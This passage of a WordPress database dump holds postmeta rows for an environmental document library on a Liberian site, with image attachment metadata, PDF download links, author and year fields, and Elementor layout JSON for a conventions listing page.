:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33709,4866,'_edit_last','42'),(33710,4866,'_wp_page_template','default'),(33711,4866,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/cbd1235.pdf'),(33712,4866,'by','UNCBD'),(33713,4866,'year',''),(33714,4866,'_pods_document_cover_image','a:1:{i:0;i:4868;}'),(33715,4866,'document_cover_image','4868'),(33716,4866,'_pods_attached_document','a:1:{i:0;i:4867;}'),(33717,4866,'attached_document','4867'),(33718,4870,'_last_editor_used_jetpack','classic-editor'),(33719,4870,'_edit_lock','1660144913:42'),(33720,4871,'_wp_attached_file','2022/08/cep_liberia_2006_.pdf'),(33721,4872,'_wp_attached_file','2022/08/Untitled-3.png'),(33722,4872,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/08/Untitled-3.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-3-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-3-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-3-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-3-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-3-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-3-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33723,4870,'_edit_last','42'),(33724,4870,'_wp_page_template','default'),(33725,4870,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/cep_liberia_2006_.pdf'),(33726,4870,'by','Dr Giorgio V. Brandolini & Dr Mohammed Tigani'),(33727,4870,'year','2006'),(33728,4870,'_pods_document_cover_image','a:1:{i:0;i:4872;}'),(33729,4870,'document_cover_image','4872'),(33730,4870,'_pods_attached_document','a:1:{i:0;i:4871;}'),(33731,4870,'attached_document','4871'),(33732,4874,'_last_editor_used_jetpack','classic-editor'),(33734,4874,'_edit_lock','1660147717:42'),(33735,4876,'_wp_attached_file','2022/08/ESIA-Procedural-Guideline.pdf'),(33736,4874,'_edit_last','42'),(33737,4874,'_wp_page_template','default'),(33738,4874,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/ESIA-Procedural-Guideline.pdf'),(33739,4874,'by','EPA'),(33740,4874,'year','2017'),(33741,4874,'_pods_attached_document','a:1:{i:0;i:4876;}'),(33743,4878,'_last_editor_used_jetpack','classic-editor'),(33745,4878,'_edit_lock','1660145913:42'),(33746,4880,'_wp_attached_file','2022/08/phase-1-esia-addendum-1-faunal-studies-main-report.pdf'),(33747,4878,'_edit_last','42'),(33748,4881,'_wp_attached_file','2022/08/Untitled-4.png'),(33749,4881,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/08/Untitled-4.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-4-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-4-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-4-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-4-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-4-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-4-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33750,4878,'_wp_page_template','default'),(33751,4878,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/phase-1-esia-addendum-1-faunal-studies-main-report.pdf'),(33752,4878,'by','Ben Phalam'),(33753,4878,'year','2011'),(33754,4878,'_pods_document_cover_image','a:1:{i:0;i:4881;}'),(33755,4878,'document_cover_image','4881'),(33756,4878,'_pods_attached_document','a:1:{i:0;i:4880;}'),(33757,4878,'attached_document','4880'),(33758,4883,'_last_editor_used_jetpack','classic-editor'),(33759,4884,'_wp_attached_file','2022/08/Ramsar-Sites-annotated-summary-Liberia.pdf'),(33760,4883,'_edit_lock','1660146236:42'),(33761,4883,'_edit_last','42'),(33762,4885,'_wp_attached_file','2022/08/Untitled-5.png'),(33763,4885,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/08/Untitled-5.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-5-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-5-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-5-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-5-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-5-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-5-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33764,4883,'_wp_page_template','default'),(33765,4883,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/Ramsar-Sites-annotated-summary-Liberia.pdf'),(33766,4883,'by',''),(33767,4883,'year',''),(33768,4883,'_pods_document_cover_image','a:1:{i:0;i:4885;}'),(33769,4883,'document_cover_image','4885'),(33770,4883,'_pods_attached_document','a:1:{i:0;i:4884;}'),(33771,4883,'attached_document','4884'),(33772,4888,'_last_editor_used_jetpack','classic-editor'),(33773,4888,'_edit_lock','1660146652:42'),(33774,4889,'_wp_attached_file','2022/08/SCC48-3Greengrass2013-HR.pdf'),(33775,4888,'_edit_last','42'),(33776,4890,'_wp_attached_file','2022/08/Untitled-6.png'),(33777,4890,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/08/Untitled-6.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-6-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-6-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-6-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-6-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-6-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-6-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33778,4888,'_wp_page_template','default'),(33779,4888,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/SCC48-3Greengrass2013-HR.pdf'),(33780,4888,'by','Elizabeth J. Greengrass'),(33781,4888,'year','2013'),(33782,4888,'_pods_document_cover_image','a:1:{i:0;i:4890;}'),(33783,4888,'document_cover_image','4890'),(33784,4888,'_pods_attached_document','a:1:{i:0;i:4889;}'),(33785,4888,'attached_document','4889'),(33786,4893,'_last_editor_used_jetpack','classic-editor'),(33787,4893,'_edit_lock','1660147020:42'),(33788,4894,'_wp_attached_file','2022/08/TEEB-phase-III.pdf'),(33789,4893,'_edit_last','42'),(33790,4893,'_wp_page_template','default'),(33791,4893,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/TEEB-phase-III.pdf'),(33792,4893,'by','Sarah Humphrey & Justine Braby'),(33793,4893,'year','2018'),(33794,4893,'_pods_attached_document','a:1:{i:0;i:4894;}'),(33796,4896,'_wp_attached_file','2022/08/Untitled-7.png'),(33797,4896,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/08/Untitled-7.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-7-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-7-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-7-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-7-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-7-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-7-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33798,4893,'_pods_document_cover_image','a:1:{i:0;i:4896;}'),(33799,4893,'document_cover_image','4896'),(33800,4893,'attached_document','4894'),(33801,4897,'_last_editor_used_jetpack','classic-editor'),(33802,4897,'_edit_lock','1660147605:42'),(33803,4897,'_edit_last','42'),(33804,4898,'_wp_attached_file','2022/08/TEEB45.pdf'),(33805,4899,'_wp_attached_file','2022/08/Untitled-8.png'),(33806,4899,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/08/Untitled-8.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-8-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-8-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-8-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-8-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-8-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-8-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33807,4897,'_wp_page_template','default'),(33808,4897,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/TEEB45.pdf'),(33809,4897,'by',''),(33810,4897,'year','2015'),(33811,4897,'_pods_document_cover_image','a:1:{i:0;i:4899;}'),(33812,4897,'document_cover_image','4899'),(33813,4897,'_pods_attached_document','a:1:{i:0;i:4898;}'),(33814,4897,'attached_document','4898'),(33815,4901,'_wp_attached_file','2022/08/Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf.png'),(33816,4901,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:120:\"2022/08/Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:120:\"Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:120:\"Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:120:\"Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:119:\"Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:120:\"Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:120:\"Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:120:\"Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33817,4874,'_pods_document_cover_image','a:1:{i:0;i:4901;}'),(33818,4874,'document_cover_image','4901'),(33819,4874,'attached_document','4876'),(33828,1872,'_elementor_version','3.6.6'),(33829,1872,'_elementor_pro_version','3.7.1'),(33834,4902,'_elementor_edit_mode','builder'),(33835,4902,'_elementor_template_type','wp-page'),(33836,4902,'_elementor_version','3.4.1'),(33837,4902,'_wp_page_template','default'),(33838,4902,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\"}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":15,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Learn More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms_tax\":\"resource_type\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"post_text_typography_font_weight\":\"600\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"selected_show_date_icon\":{\"value\":\"fas fa-check-circle\",\"library\":\"fa-solid\"},\"__fa4_migrated\":{\"selected_show_date_icon\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5637a09\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"97f9083\"}]},\"elements\":[{\"id\":\"0f20919\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5d8a038\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b73161c\"}]},\"elements\":[{\"id\":\"1dd8ad2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(33840,4902,'_elementor_pro_version','3.3.6'),(33842,4903,'_elementor_edit_mode','builder'),(33843,4903,'_elementor_template_type','wp-page'),(33844,4903,'_elementor_version','3.4.1'),(33845,4903,'_wp_page_template','default'),(33846,4903,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\"}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":15,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Learn More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms_tax\":\"resource_type\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"a